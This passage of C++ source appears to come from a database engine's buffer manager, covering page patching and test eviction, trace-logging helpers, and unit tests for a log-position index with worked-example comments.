Assert( 0 == CmpRbspos( pbf->rbsposSnapshot, rbsposMin ) );
Assert( 0 == CmpLgpos( pbf->lgposOldestBegin0, lgposMax ) );
Call( ErrBFISyncWrite( pbf, bfltWrite, qosIODispatchImmediate, *tcPatchPage ) );
Call( ErrIOFlushDatabaseFileBuffers( ifmp, iofrPagePatching ) );
//
// evict page
//
    // note: the BFDirty() inside ::ErrDoPatch() actually clears the err state in the BF, so the evict-
    // page step below may be vestigial at this point.  but for now, I'll Expected() no err, and maintain
    // the design principle that SOMEONE and I (SOMEONE) set out: endeavour to evict the buffer from the
    // cache so that it (A) ends up in a well-known state by being re-read from disk through the normal
    // path, and (B) validates that the on-disk copy is actually fixed.
Expected( pbf->err >= JET_errSuccess );
// mark this BF as "newly evicted" so that it does not cause cache growth
// when BF is reused
pbf->fNewlyEvicted = fTrue;
// check nothing moved under us
AssertRTL( FBFICurrentPage( pbf, ifmp, pgno ) );
// lock this BF in the LRUK in preparation for a possible eviction
g_bflruk.LockResourceForEvict( pbf, &lockLRUK );
fLockedLRUK = true;
// release write latch, so evict can operate correctly
pbf->sxwl.ReleaseWriteLatch();
// actually evict the page
// Note with no lock, we may evict a completely different page unintentionally ... but
// this is OK because it means the original page was also evicted. Hopefully versioning
    // of pages isn't at play here, because we shouldn't version a page in a bad/err state.
// note: best effort, may ALSO fail due to LRU-K contention??
err = ErrBFIEvictPage( pbf, &lockLRUK, bfefReasonPatch );
// evict takes the w-latch from us (even on failure) ...
pbf = NULL;
if ( err < JET_errSuccess )
{
Error( ErrERRCheck( JET_errDatabaseInUse ) );
}
HandleError:
if ( err < JET_errSuccess )
{
OSTrace(
JET_tracetagBufferManager,
OSFormat( "Patching ifmp:pgno %d:%d fails with error %d", (ULONG)ifmp, pgno, err ) );
}
if ( pbf )
{
// We own the write latch, we must let it go
pbf->sxwl.ReleaseWriteLatch();
}
if ( fLockedLRUK )
{
// unlock the LRUK
g_bflruk.UnlockResourceForEvict( &lockLRUK );
}
return err;
}
// this code evicts the specified ifmp / pgno from the cache
// NOTE: This API is not designed to be used by production code!
ERR ErrBFTestEvictPage( _In_ const IFMP ifmp, _In_ const PGNO pgno )
{
ERR err = errCodeInconsistency;
OSTrace( JET_tracetagBufferManager, OSFormat( "Test Evicting ifmp:pgno %d:%d", (ULONG)ifmp, pgno ) );
    // There is no fixed path to guarantee an eviction of a page due to the locking order
    // of the BF latch and g_bfhash.  So we will brute-force it, retrying the eviction in
    // a loop (waiting 10 ms between attempts).
ULONG iIter = 0;
TICK tickStart = TickOSTimeCurrent();
do
{
// First we need to find the pbf that we think holds this ifmp:pgno ...
BFHash::CLock lockHash;
PGNOPBF pgnopbf;
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lockHash );
BFHash::ERR errHash = g_bfhash.ErrRetrieveEntry( &lockHash, &pgnopbf );
g_bfhash.ReadUnlockKey( &lockHash );
Assert( errHash == BFHash::ERR::errSuccess || errHash == BFHash::ERR::errEntryNotFound );
if( errHash == BFHash::ERR::errEntryNotFound )
{
// Prescient eviction! We evicted it before we even needed to evict it, VERY efficient.
err = JET_errSuccess;
break;
}
if( errHash == BFHash::ERR::errSuccess ) // only on success, just in case
{
// Ok, we should have the BF we want in pbf
            // note: since we released the g_bfhash read lock, there is absolutely
            // nothing protecting this path from AVing during term.  We are leaving
            // it in the hands of the test code to avoid calling the evict data
            // API concurrently with term.
//Assert( FBFICurrentPage( pgnopbf.pbf, ifmp, pgno ) );
Assert( pgnopbf.pbf->ifmp == ifmp &&
pgnopbf.pbf->pgno == pgno &&
pgnopbf.pbf->fCurrentVersion );
// Lock this BF in the LRUK in preparation for a possible eviction.
BFLRUK::CLock lockLRUK;
g_bflruk.LockResourceForEvict( pgnopbf.pbf, &lockLRUK );
// Now we need to re-acquire the g_bfhash to check we still have the right
// BF (sigh, rank violation avoidance)
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lockHash );
errHash = g_bfhash.ErrRetrieveEntry( &lockHash, &pgnopbf );
g_bfhash.ReadUnlockKey( &lockHash );
if( errHash != BFHash::ERR::errSuccess )
{
                // Fortuitous eviction!  Someone evicted it while we were thinking of evicting it
Assert( errHash == BFHash::ERR::errEntryNotFound );
err = JET_errSuccess;
}
            else    //  errHash == BFHash::ERR::errSuccess
{
// Actually evict the page
// Note: best effort, may fail due to latch or LRU-K contention??
err = ErrBFIEvictPage( pgnopbf.pbf, &lockLRUK, bfefReasonTest );
// Note: evict releases the g_bfhash write lock
if ( err < JET_errSuccess )
{
if ( err == errBFIPageDirty )
{
// note: in case it comes up, this is an untested code path ...
CBFIssueList bfil;
// could not evict the page, flush the page instead
(void)ErrBFIFlushPage( pgnopbf.pbf, IOR( iorpDirectAccessUtil, iorfForeground ), qosIODispatchImmediate, bfdfDirty, fFalse /* default */, NULL );
CallS( bfil.ErrIssue() );
// hopefully we made some progress, sleep a little to give flush a chance to work
UtilSleep( cmsecWaitIOComplete );
}
}
else
{
// we supposedly succeeded, but the pbf may have converted to an older version
// while we didn't have it locked under the BF hash (thus thwarting our attempt
// to actually evict the current version page from the cache) so we'll set the error to
// JET_errDatabaseInUse below to force re-evaluation, but we don't want to
// waste a retry attempt.
iIter--;
}
// always force retry.
err = ErrERRCheck( JET_errDatabaseInUse );
}
// unlock the LRUK
g_bflruk.UnlockResourceForEvict( &lockLRUK );
}
iIter++;
}
while ( err == JET_errDatabaseInUse && ( iIter < 10 || DtickDelta( tickStart, TickOSTimeCurrent() ) < 300 ) );
if ( err < JET_errSuccess )
{
OSTrace( JET_tracetagBufferManager, OSFormat( "Evicting ifmp:pgno %d:%d fails with error %d", (ULONG)ifmp, pgno, err ) );
}
return err;
}
///////////////////////////////////////////////////////////////////////////////
//
// BF Internal Functions
//
///////////////////////////////////////////////////////////////////////////////
//////////////////////////////
// Buffer Manager Global Flags
BOOL g_fBFInitialized = fFalse;
BYTE* g_rgbBFTemp = NULL;
TICK g_tickBFPreparingCrashDump;
size_t cBFInspectedForInclusionInCrashDump;
size_t cBFMismatchedVMPageIncludedInCrashDump;
size_t cBFDirtiedPageIncludedInCrashDump;
size_t cBFCachedPageIncludedInCrashDump;
size_t cBFLatchedPageIncludedInCrashDump;
size_t cBFReferencedPageIncludedInCrashDump;
size_t cBFRecentlyTouchedPageIncludedInCrashDump;
size_t cBFErrorIncludedInCrashDump;
size_t cBFIOIncludedInCrashDump;
size_t cBFUnverifiedIncludedInCrashDump;
size_t cBFMayBeRemovedFromCrashDump;
size_t cBFVMPagesIncludedInCrashDump;
size_t cBFVMPagesRemovedFromCrashDump;
TICK g_tickBFCrashDumpPrepared;
ERR g_errBFCrashDumpResult;
BOOL g_fBFErrorBuildingReferencedPageListForCrashDump = fFalse;
/////////////////////////////////////
// Buffer Manager Global Constants
double g_dblBFSpeedSizeTradeoff;
//////////////////////////////////////
// Buffer Manager Global Statistics
ULONG cBFOpportuneWriteIssued;
//////////////////////////
// IFMP/PGNO Hash Table
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
#pragma data_seg( "cacheline_aware_data" )
#endif // MINIMAL_FUNCTIONALITY
BFHash g_bfhash( rankBFHash );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
#pragma data_seg()
#endif // MINIMAL_FUNCTIONALITY
double g_dblBFHashLoadFactor;
double g_dblBFHashUniformity;
////////////////
// Avail Pool
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
#pragma bss_seg( "cacheline_aware_data" )
#endif // MINIMAL_FUNCTIONALITY
BFAvail g_bfavail;
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
#pragma bss_seg()
#endif // MINIMAL_FUNCTIONALITY
////////////////
// Quiesced List
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
#pragma bss_seg( "cacheline_aware_data" )
#endif // MINIMAL_FUNCTIONALITY
BFQuiesced g_bfquiesced;
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
#pragma bss_seg()
#endif // MINIMAL_FUNCTIONALITY
//////////
// LRUK
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
#pragma data_seg( "cacheline_aware_data" )
#endif // MINIMAL_FUNCTIONALITY
BFLRUK g_bflruk( rankBFLRUK );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
#pragma data_seg()
#endif // MINIMAL_FUNCTIONALITY
double g_csecBFLRUKUncertainty;
/////////////////////
// BF FTL tracing
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
CFastTraceLog* g_pbfftl = NULL;
#endif // MINIMAL_FUNCTIONALITY
IOREASON g_iorBFTraceFile( iorpOsLayerTracing );
class CFileSystemConfiguration : public CDefaultFileSystemConfiguration
{
public:
CFileSystemConfiguration()
{
m_dtickAccessDeniedRetryPeriod = 500;
}
} g_fsconfigBFIFTL;
ERR ErrBFIFTLInit()
{
ERR err = JET_errSuccess;
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
WCHAR wszPath[IFileSystemAPI::cchPathMax];
Assert( g_pbfftl == NULL );
Alloc( g_pbfftl = new CFastTraceLog( NULL, &g_fsconfigBFIFTL ) );
//#define BFFTL_TRACE_ALWAYS_ON
#ifdef BFFTL_TRACE_ALWAYS_ON
OSStrCbCopyW( wszPath, sizeof(wszPath), L".\\bftracer.ftl" );
if ( fTrue )
#else
if ( FOSConfigGet_( L"BF", L"FTL Trace File", wszPath, sizeof(wszPath) )
&& wszPath[0] )
#endif
{
err = g_pbfftl->ErrFTLInitWriter( wszPath, &g_iorBFTraceFile, CFastTraceLog::ftlifReOpenExisting );
if ( err == JET_errFileAccessDenied )
{
WCHAR wszDiffTrace[33];
// rather than disable the traces, we'll just find a different name to log them under
OSStrCbFormatW( wszDiffTrace, sizeof(wszDiffTrace), L".\\bftracePID%d.ftl", DwUtilProcessId() );
err = g_pbfftl->ErrFTLInitWriter( wszDiffTrace, &g_iorBFTraceFile, CFastTraceLog::ftlifReOpenExisting );
}
if ( err == JET_errFileAccessDenied )
{
// So why does this happen? Most likely because some low priv process (like Transport) doesn't have
// permission to write to the current directory which is where we place our file.
g_pbfftl->SetFTLDisabled();
err = JET_errSuccess;
}
Call( err );
}
else
{
g_pbfftl->SetFTLDisabled();
}
HandleError:
if ( err < JET_errSuccess )
{
delete g_pbfftl;
g_pbfftl = NULL;
}
#endif // MINIMAL_FUNCTIONALITY
return err;
}
void BFIFTLTerm()
{
#ifdef MINIMAL_FUNCTIONALITY
return;
#else // !MINIMAL_FUNCTIONALITY
Assert( g_pbfftl != NULL );
g_pbfftl->FTLTerm();
delete g_pbfftl;
g_pbfftl = NULL;
#endif // MINIMAL_FUNCTIONALITY
}
/////////////////////
// BF tracing
#ifdef DEBUG
#define ENABLE_BFFTL_TRACING
#endif
INLINE void BFITraceResMgrInit(
const INT K,
const double csecCorrelatedTouch,
const double csecTimeout,
const double csecUncertainty,
const double dblHashLoadFactor,
const double dblHashUniformity,
const double dblSpeedSizeTradeoff )
{
#ifdef ENABLE_BFFTL_TRACING
(void)ErrBFIFTLSysResMgrInit(
K,
csecCorrelatedTouch,
csecTimeout,
csecUncertainty,
dblHashLoadFactor,
dblHashUniformity,
dblSpeedSizeTradeoff );
#endif // ENABLE_BFFTL_TRACING
ETResMgrInit(
TickOSTimeCurrent(),
K,
csecCorrelatedTouch,
csecTimeout,
csecUncertainty,
dblHashLoadFactor,
dblHashUniformity,
dblSpeedSizeTradeoff );
}
INLINE void BFITraceResMgrTerm()
{
#ifdef ENABLE_BFFTL_TRACING
(void)ErrBFIFTLSysResMgrTerm();
#endif // ENABLE_BFFTL_TRACING
ETResMgrTerm( TickOSTimeCurrent() );
}
INLINE void BFITraceCachePage(
const TICK tickCache,
const PBF pbf,
const BFLatchType bflt,
const ULONG pctPriority,
const BFLatchFlags bflf,
const BFRequestTraceFlags bfrtf,
const TraceContext& tc )
{
GetCurrUserTraceContext getutc;
const BYTE bClientType = getutc->context.nClientType;
#ifdef ENABLE_BFFTL_TRACING
#endif // ENABLE_BFFTL_TRACING
ETCacheCachePage(
tickCache,
pbf->ifmp,
pbf->pgno,
bflf,
bflt,
pctPriority,
bfrtf,
bClientType );
}
INLINE void BFITraceRequestPage(
const TICK tickTouch,
const PBF pbf,
const ULONG pctPriority,
const BFLatchType bflt,
const BFLatchFlags bflf,
const BFRequestTraceFlags bfrtf,
const TraceContext& tc )
{
#ifdef ENABLE_BFFTL_TRACING
GetCurrUserTraceContext getutc;
const BYTE bClientType = getutc->context.nClientType;
(void)ErrBFIFTLTouch(
tickTouch,
pbf->ifmp,
pbf->pgno,
bflt,
bClientType,
pctPriority,
!!( bfrtf & bfrtfUseHistory ),
!!( bfrtf & bfrtfNewPage ),
!!( bfrtf & bfrtfNoTouch ),
!!( bfrtf & bfrtfDBScan ) );
#endif // ENABLE_BFFTL_TRACING
if ( FOSEventTraceEnabled< _etguidCacheRequestPage >() )
{
#ifndef ENABLE_BFFTL_TRACING
GetCurrUserTraceContext getutc;
const BYTE bClientType = getutc->context.nClientType;
#endif
OSEventTrace_(
_etguidCacheRequestPage,
10,
&tickTouch,
&(pbf->ifmp),
&(pbf->pgno),
&bflf,
&( ( (CPAGE::PGHDR *)( pbf->pv ) )->objidFDP ),
&( ( (CPAGE::PGHDR *)( pbf->pv ) )->fFlags ),
&bflt,
&pctPriority,
&bfrtf,
&bClientType );
}
}
INLINE void BFITraceMarkPageAsSuperCold(
const IFMP ifmp,
const PGNO pgno )
{
#ifdef ENABLE_BFFTL_TRACING
(void)ErrBFIFTLMarkAsSuperCold( ifmp, pgno );
#endif // ENABLE_BFFTL_TRACING
ETMarkPageAsSuperCold( TickOSTimeCurrent(), ifmp, pgno );
}
INLINE void BFITraceEvictPage(
const IFMP ifmp,
const PGNO pgno,
const BOOL fCurrentVersion,
const ERR errBF,
const ULONG bfef )
{
const ULONG pctPriority = 0; // Not relevant for eviction anymore.
#ifdef ENABLE_BFFTL_TRACING
(void)ErrBFIFTLEvict( ifmp, pgno, fCurrentVersion, errBF, bfef, pctPriority );
#endif // ENABLE_BFFTL_TRACING
const TICK tickEvictPage = TickOSTimeCurrent();
ETCacheEvictPage( tickEvictPage, ifmp, pgno, fCurrentVersion, errBF, bfef, pctPriority );
}
INLINE void BFITraceDirtyPage(
const PBF pbf,
const BFDirtyFlags bfdf,
const TraceContext& tc )
{
auto tick = TickOSTimeCurrent();
static_assert( sizeof(tick) == sizeof(DWORD), "Compiler magic failing." );
    // Note that pbf->lgposModify contains the current lgposModify of the buffer, prior
    // to it being updated to reflect the new lgposModify that is triggering the dirty
    // operation. Each setting of lgposModify generates its own trace, and that trace is
    // the better way to determine the lgpos associated with the dirty operation.
// Need to read atomically because removing undo info may change it from under us
// without a latch.
const LGPOS lgposModifyRead = pbf->lgposModify.LgposAtomicRead();
const ULONG lgposModifyLGen = (ULONG)lgposModifyRead.lGeneration;
const USHORT lgposModifyISec = lgposModifyRead.isec;
const USHORT lgposModifyIb = lgposModifyRead.ib;
Assert( (LONG)lgposModifyLGen == lgposModifyRead.lGeneration );
#ifdef ENABLE_BFFTL_TRACING
(void)ErrBFIFTLDirty( pbf->ifmp, pbf->pgno, bfdf, lgposModifyLGen, lgposModifyISec, lgposModifyIb );
#endif // ENABLE_BFFTL_TRACING
Assert( CmpLgpos( pbf->lgposModify.LgposAtomicRead(), lgposModifyRead ) >= 0 );
const CPAGE::PGHDR * ppghdr = (const CPAGE::PGHDR *)pbf->pv;
GetCurrUserTraceContext getutc;
if ( pbf->bfdf < bfdfDirty /* first "proper" dirty */ )
{
// There is no point in logging itagMicFree, cbfree, dbtime because they would be the
// same as the most recent read page trace at this point.
ETCacheFirstDirtyPage(
tick,
pbf->ifmp,
pbf->pgno,
ppghdr->objidFDP,
ppghdr->fFlags,
bfdf,
lgposModifyRead.qw,
getutc->context.dwUserID,
getutc->context.nOperationID,
getutc->context.nOperationType,
getutc->context.nClientType,
getutc->context.fFlags,
getutc->dwCorrelationID,
tc.iorReason.Iorp(),
tc.iorReason.Iors(),
tc.iorReason.Iort(),
tc.iorReason.Ioru(),
tc.iorReason.Iorf(),
tc.nParentObjectClass );
}
ETCacheDirtyPage(
tick,
pbf->ifmp,
pbf->pgno,
ppghdr->objidFDP,
ppghdr->fFlags,
bfdf,
lgposModifyRead.qw,
getutc->context.dwUserID,
getutc->context.nOperationID,
getutc->context.nOperationType,
getutc->context.nClientType,
getutc->context.fFlags,
getutc->dwCorrelationID,
tc.iorReason.Iorp(),
tc.iorReason.Iors(),
tc.iorReason.Iort(),
tc.iorReason.Ioru(),
tc.iorReason.Iorf(),
tc.nParentObjectClass );
}
INLINE void BFITraceSetLgposModify(
const PBF pbf,
const LGPOS& lgposModify )
{
auto tick = TickOSTimeCurrent();
static_assert( sizeof(tick) == sizeof(DWORD), "Compiler magic failing." );
#ifdef ENABLE_BFFTL_TRACING
const ULONG lgposModifyLGen = (ULONG)lgposModify.lGeneration;
const USHORT lgposModifyISec = lgposModify.isec;
const USHORT lgposModifyIb = lgposModify.ib;
Assert( (LONG)lgposModifyLGen == lgposModify.lGeneration );
(void)ErrBFIFTLSetLgposModify( pbf->ifmp, pbf->pgno, lgposModifyLGen, lgposModifyISec, lgposModifyIb );
#endif // ENABLE_BFFTL_TRACING
ETCacheSetLgposModify(
tick,
pbf->ifmp,
pbf->pgno,
lgposModify.qw );
}
INLINE void BFITraceWritePage(
const PBF pbf,
const FullTraceContext& tc )
{
const ULONG bfdfTrace = (ULONG)pbf->bfdf; // We need to put this on the stack because & isn't valid on a bitfield
auto tick = TickOSTimeCurrent();
Assert( tc.etc.iorReason.Iorp() != iorpNone );
#ifdef ENABLE_BFFTL_TRACING
// Update: Now that we're FTL logging from the IO completion, it can cause IO issue
// and sync complete below the existing completion:
// ese!OSSYNC::CLockDeadlockDetectionInfo::AssertCleanApiExit+0xd4 [d:\src\e16\esemulti\sources\dev\ese\published\inc\sync.hxx @ 3408]
// ese!OSDiskIIOThreadCompleteWithErr+0x8a6 [d:\src\e16\esemulti\sources\dev\ese\src\os\osdisk.cxx @ 6984]
// ese!COSFile::ErrIOAsync+0x6ef [d:\src\e16\esemulti\sources\dev\ese\src\os\osfile.cxx @ 1811]
// ese!COSFile::ErrIOWrite+0x2c2 [d:\src\e16\esemulti\sources\dev\ese\src\os\osfile.cxx @ 1111]
// ese!CFastTraceLog::ErrFTLIFlushBuffer+0x9fb [d:\src\e16\esemulti\sources\dev\ese\src\os\trace.cxx @ 2461]
// ese!CFastTraceLog::ErrFTLFlushBuffer+0x3d [d:\src\e16\esemulti\sources\dev\ese\src\os\trace.cxx @ 2494]
// ese!CFastTraceLogBuffer::ErrFTLBTrace+0x2b6 [d:\src\e16\esemulti\distrib\private\inc\trace.hxx @ 598]
// ese!CFastTraceLog::ErrFTLTrace+0x90 [d:\src\e16\esemulti\sources\dev\ese\src\os\trace.cxx @ 2524]
// ese!ErrBFIFTLWrite+0xc7 [d:\src\e16\esemulti\sources\dev\ese\published\inc\bf\bfftl.hxx @ 337]
// ese!BFITraceWritePage+0x111 [d:\src\e16\esemulti\sources\dev\ese\src\ese\bf.cxx @ 6035]
// ese!BFIAsyncWriteComplete+0xc1 [d:\src\e16\esemulti\sources\dev\ese\src\ese\bf.cxx @ 25254]
// ese!COSFile::IOComplete+0xe5 [d:\src\e16\esemulti\sources\dev\ese\src\os\osfile.cxx @ 1592]
// ese!COSFile::IOComplete_+0x26 [d:\src\e16\esemulti\sources\dev\ese\src\os\osfile.cxx @ 1565]
// ese!OSDiskIIOThreadCompleteWithErr+0x907 [d:\src\e16\esemulti\sources\dev\ese\src\os\osdisk.cxx @ 6999]
// ese!OSDiskIIOThreadIComplete+0x150 [d:\src\e16\esemulti\sources\dev\ese\src\os\osdisk.cxx @ 7047]
// ese!CTaskManager::TMIDispatch+0x800 [d:\src\e16\esemulti\sources\dev\ese\src\os\task.cxx @ 766]
// Ultimately this could be fixed by [re]moving FTL tracing off the existing IO mechanism and using
        // its own NT API writing calls, which would also fix the other issue in ErrBFIPrereadPage() at the
// same time.
//(void)ErrBFIFTLWrite( pbf->ifmp, pbf->pgno, BFDirtyFlags( pbf->bfdf ), iorp );
#endif // ENABLE_BFFTL_TRACING
ETCacheWritePage(
tick,
pbf->ifmp,
pbf->pgno,
(((CPAGE::PGHDR *)(pbf->pv))->objidFDP),
(((CPAGE::PGHDR *)(pbf->pv))->fFlags),
bfdfTrace,
tc.utc.context.dwUserID,
tc.utc.context.nOperationID,
tc.utc.context.nOperationType,
tc.utc.context.nClientType,
tc.utc.context.fFlags,
tc.utc.dwCorrelationID,
tc.etc.iorReason.Iorp(),
tc.etc.iorReason.Iors(),
tc.etc.iorReason.Iort(),
tc.etc.iorReason.Ioru(),
tc.etc.iorReason.Iorf(),
tc.etc.nParentObjectClass );
}
////////////////////////////////////////////
// Oldest Begin 0 Index and Overflow List
#ifdef ENABLE_JET_UNIT_TEST
// verifies that the OB0 index will function with the worst case configuration
void BFIOB0UnitTest( const ULONG cSec, const ULONG cbSec )
{
LGPOS lgposPrecision = { 0, 0, 2 * lgenCheckpointTooDeepMax };
Assert( ( cbCheckpointTooDeepUncertainty % cbSec ) == 0 );
LGPOS lgposUncertainty = { 0, (USHORT)( cbCheckpointTooDeepUncertainty / cbSec ), 0 };
BFOB0 bfob0( rankBFOB0 );
BFOB0::ERR errOB0Init = bfob0.ErrInit( lgposPrecision.IbOffset( cSec, cbSec ),
lgposUncertainty.IbOffset( cSec, cbSec ),
99.9 );
Assert( errOB0Init == BFOB0::ERR::errSuccess ||
errOB0Init == BFOB0::ERR::errOutOfMemory );
if ( errOB0Init == BFOB0::ERR::errSuccess )
{
LGPOS lgpos1;
lgpos1.SetByIbOffset( lgposMin.IbOffset( cSec, cbSec ), cSec, cbSec );
BF bf1;
BFOB0::CLock lock;
bfob0.LockKeyPtr( lgpos1.IbOffset( cSec, cbSec ), &bf1, &lock );
BFOB0::ERR errOB0Insert1 = bfob0.ErrInsertEntry( &lock, &bf1 );
bfob0.UnlockKeyPtr( &lock );
Assert( errOB0Insert1 == BFOB0::ERR::errSuccess ||
errOB0Insert1 == BFOB0::ERR::errOutOfMemory );
if ( errOB0Insert1 == BFOB0::ERR::errSuccess )
{
LGPOS lgpos2;
lgpos2.SetByIbOffset( lgpos1.IbOffset( cSec, cbSec ) + 1 * lgposPrecision.IbOffset( cSec, cbSec ) / 4, cSec, cbSec );
BF bf2;
bfob0.LockKeyPtr( lgpos2.IbOffset( cSec, cbSec ), &bf2, &lock );
BFOB0::ERR errOB0Insert2 = bfob0.ErrInsertEntry( &lock, &bf2 );
bfob0.UnlockKeyPtr( &lock );
Assert( errOB0Insert2 == BFOB0::ERR::errSuccess ||
errOB0Insert2 == BFOB0::ERR::errOutOfMemory );
if ( errOB0Insert2 == BFOB0::ERR::errSuccess )
{
LGPOS lgpos3;
lgpos3.SetByIbOffset( lgpos1.IbOffset( cSec, cbSec ) + 2 * lgposPrecision.IbOffset( cSec, cbSec ) / 4 - lgposUncertainty.IbOffset( cSec, cbSec ), cSec, cbSec );
BF bf3;
bfob0.LockKeyPtr( lgpos3.IbOffset( cSec, cbSec ), &bf3, &lock );
BFOB0::ERR errOB0Insert3 = bfob0.ErrInsertEntry( &lock, &bf3 );
bfob0.UnlockKeyPtr( &lock );
Assert( errOB0Insert3 == BFOB0::ERR::errSuccess ||
errOB0Insert3 == BFOB0::ERR::errOutOfMemory );
if ( errOB0Insert3 == BFOB0::ERR::errSuccess )
{
LGPOS lgpos4;
lgpos4.SetByIbOffset( lgpos1.IbOffset( cSec, cbSec ) + 2 * lgposPrecision.IbOffset( cSec, cbSec ) / 4 + 2 * lgposUncertainty.IbOffset( cSec, cbSec ), cSec, cbSec );
BF bf4;
bfob0.LockKeyPtr( lgpos4.IbOffset( cSec, cbSec ), &bf4, &lock );
BFOB0::ERR errOB0Insert4 = bfob0.ErrInsertEntry( &lock, &bf4 );
bfob0.UnlockKeyPtr( &lock );
Assert( errOB0Insert4 == BFOB0::ERR::errKeyRangeExceeded ||
errOB0Insert4 == BFOB0::ERR::errOutOfMemory );
LGPOS lgpos5;
lgpos5.SetByIbOffset( lgpos1.IbOffset( cSec, cbSec ) + 3 * lgposPrecision.IbOffset( cSec, cbSec ) / 4, cSec, cbSec );
BF bf5;
bfob0.LockKeyPtr( lgpos5.IbOffset( cSec, cbSec ), &bf5, &lock );
BFOB0::ERR errOB0Insert5 = bfob0.ErrInsertEntry( &lock, &bf5 );
bfob0.UnlockKeyPtr( &lock );
Assert( errOB0Insert5 == BFOB0::ERR::errKeyRangeExceeded ||
errOB0Insert5 == BFOB0::ERR::errOutOfMemory );
LGPOS lgpos6;
lgpos6.SetByIbOffset( lgpos1.IbOffset( cSec, cbSec ) + 4 * lgposPrecision.IbOffset( cSec, cbSec ) / 4 - 2 * lgposUncertainty.IbOffset( cSec, cbSec ), cSec, cbSec );
BF bf6;
bfob0.LockKeyPtr( lgpos6.IbOffset( cSec, cbSec ), &bf6, &lock );
BFOB0::ERR errOB0Insert6 = bfob0.ErrInsertEntry( &lock, &bf6 );
bfob0.UnlockKeyPtr( &lock );
Assert( errOB0Insert6 == BFOB0::ERR::errKeyRangeExceeded ||
errOB0Insert6 == BFOB0::ERR::errOutOfMemory );
bfob0.LockKeyPtr( lgpos3.IbOffset( cSec, cbSec ), &bf3, &lock );
BFOB0::ERR errOB0Delete3 = bfob0.ErrDeleteEntry( &lock );
Assert( errOB0Delete3 == BFOB0::ERR::errSuccess );
bfob0.UnlockKeyPtr( &lock );
}
bfob0.LockKeyPtr( lgpos2.IbOffset( cSec, cbSec ), &bf2, &lock );
BFOB0::ERR errOB0Delete2 = bfob0.ErrDeleteEntry( &lock );
Assert( errOB0Delete2 == BFOB0::ERR::errSuccess );
bfob0.UnlockKeyPtr( &lock );
}
bfob0.LockKeyPtr( lgpos1.IbOffset( cSec, cbSec ), &bf1, &lock );
BFOB0::ERR errOB0Delete1 = bfob0.ErrDeleteEntry( &lock );
Assert( errOB0Delete1 == BFOB0::ERR::errSuccess );
bfob0.UnlockKeyPtr( &lock );
}
bfob0.Term();
}
}
JETUNITTEST( BF, BFIOB0SmallLogsSmallSectors )
{
BFIOB0UnitTest( ( 128 * 1024 ) / 512, 512 ); // 128 KB logs, 512 B sectors
}
JETUNITTEST( BF, BFIOB0SmallLogsLargeSectors )
{
BFIOB0UnitTest( ( 128 * 1024 ) / ( 4 * 1024 ), 4 * 1024 ); // 128 KB logs, 4 KB sectors
}
JETUNITTEST( BF, BFIOB0LargeLogsSmallSectors )
{
BFIOB0UnitTest( ( 1 * 1024 * 1024 ) / 512, 512 ); // 1 MB logs, 512 B sectors
}
JETUNITTEST( BF, BFIOB0LargeLogsLargeSectors )
{
BFIOB0UnitTest( ( 1 * 1024 * 1024 ) / ( 4 * 1024 ), 4 * 1024 ); // 1 MB logs, 4 KB sectors
}
#endif // ENABLE_JET_UNIT_TEST
// Note: the offset is not a pure byte offset: with 5 MB log files, lgpos 1:0:0 and 2:0:0
// come out as 8 MB and 16 MB respectively, because the per-generation offset is rounded
// up to a power of two.  So we "skipped 3 MBs of offset" per generation.
QWORD BFIOB0Offset( const IFMP ifmp, const LGPOS* const plgpos )
{
INST* const pinst = PinstFromIfmp( ifmp );
LOG* const plog = pinst->m_plog;
// This will verify that the lgpos is within the right range
OnDebug( plog->CbLGOffsetLgposForOB0( *plgpos, lgposMin ) );
LGPOS lgposFile = { 0, 0, 1 };
LGPOS lgposIb = { plgpos->ib, plgpos->isec, 0 };
QWORD offsetFile = plog->CbLGOffsetLgposForOB0( lgposFile, lgposMin );
QWORD p2offsetFile = LNextPowerOf2( (LONG)offsetFile );
return p2offsetFile * plgpos->lGeneration + plog->CbLGOffsetLgposForOB0( lgposIb, lgposMin );
}
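// Worked example of the mapping above (using the 5 MB log files mentioned in the note;
// numbers are illustrative only): offsetFile for one whole generation is ~5 MB, which
// LNextPowerOf2() rounds up to p2offsetFile = 8 MB.  So lgpos 1:0:0 maps to 8 MB and
// 2:0:0 maps to 16 MB, matching the note above, with the intra-generation offset added
// on top.  The ~3 MB of key space "skipped" per generation is simply never used.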
// Gives the OB0-based uncertainty-bucket LGPOS.  Normally rounds down to the bucket
// boundary, but with fNextBucket it rounds up to the next one.
INLINE LGPOS BFIOB0Lgpos( const IFMP ifmp, LGPOS lgpos, const BOOL fNextBucket )
{
INST* const pinst = PinstFromIfmp( ifmp );
LOG* const plog = pinst->m_plog;
lgpos = plog->LgposLGFromIbForOB0(
( plog->CbLGOffsetLgposForOB0( lgpos, lgposMin ) /
cbCheckpointTooDeepUncertainty +
( fNextBucket ? 1 : 0 ) ) *
cbCheckpointTooDeepUncertainty );
// An LGPOS with an lGeneration of less than 1 is not valid by ESE standards. This can happen in
    // this function when the uncertainty is bigger than a single log file.
if ( lgpos.lGeneration < 1 )
{
Assert( lgpos.lGeneration == 0 );
lgpos.lGeneration = 1;
lgpos.isec = 0;
lgpos.ib = 0;
}
return lgpos;
}
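// Worked example of the bucketing above (illustrative numbers only): if
// cbCheckpointTooDeepUncertainty were 1 MB and an lgpos mapped to a byte offset of 5.3 MB,
// it would round down to the lgpos at the 5 MB boundary, or up to 6 MB with fNextBucket.
// The clamp at the end of the function (hit when the computed boundary lands in generation 0,
// which can happen when the uncertainty spans more than one log file) pins the result to
// 1:0:0, the smallest valid lgpos.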
///////////////////////////////
// Deferred Undo Information
CRITPOOL< BF > g_critpoolBFDUI;
///////////
// Cache
